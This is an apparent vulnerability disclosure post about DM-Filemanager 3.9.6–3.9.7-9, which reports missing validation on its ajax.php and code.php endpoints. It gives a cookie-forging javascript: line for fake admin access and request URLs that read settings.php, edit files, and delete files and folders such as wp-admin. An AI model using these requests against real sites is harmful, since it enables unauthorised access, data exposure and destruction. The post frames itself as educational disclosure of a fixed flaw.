DM-Filemanager 3.9.6-9 Multiple Vulnerabilities

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

The next major issues we found with DM-Filemanager version 3.9.6 – 3.9.7-9* dealt with several vulnerabilities. Below is the method used to exploit this vulnerability and a list of possible exploits. Please be aware that this has since been fixed and is no longer vulnerable.

I discovered that direct calls to ajax.php, code.php and rich.php are not properly validated. Possible exploits for this vulnerability are file disclosure, loss of data and sensitive information, XSS (via source code editing), session hijacking (via XSS), web site defacement and database manipulation/exposure.

*You must use:

javascript:void(document.cookie="USER=someadminuser"); void(document.cookie="USERID=50");void(document.cookie="GROUP=ADMINISTRATORS"); void(document.cookie="GROUPID=1");

Create a new file (see edit below for an easier method):

    http://localhost/dm-filemanager/ajax.php?newfile=yes&filename=index.php

Download files:

    http://localhost/dm-filemanager/?download=yes&file=settings.php&currdir=/dm-filemanager/

Rename:

    http://localhost/dm-filemanager/ajax.php?file=index.shtml&currdir=/&destination=/&rn=yes&newname=index.html

Copy:

    http://localhost/dm-filemanager/ajax.php?file=config.php&currdir=/&destination=/&cp=yes

Edit: (This one has potential ;-))

    http://localhost/dm-filemanager/code.php?editfile=yes&file=exploit.php&currdir=/

Delete File:

    http://localhost/dm-filemanager/ajax.php?delete=yes&file=index.php&currdir=/wp/&destination=/wp/

Delete Folders:

    http://localhost/dm-filemanager/ajax.php?currdir=/wp/&rmdir=yes&folder=/wp/wp-admin&dir=wp-admin

All DM-Filemanager users are strongly encouraged to upgrade their software to the latest version.

Tags: , , , , ,

No comments yet.

Leave a Reply

*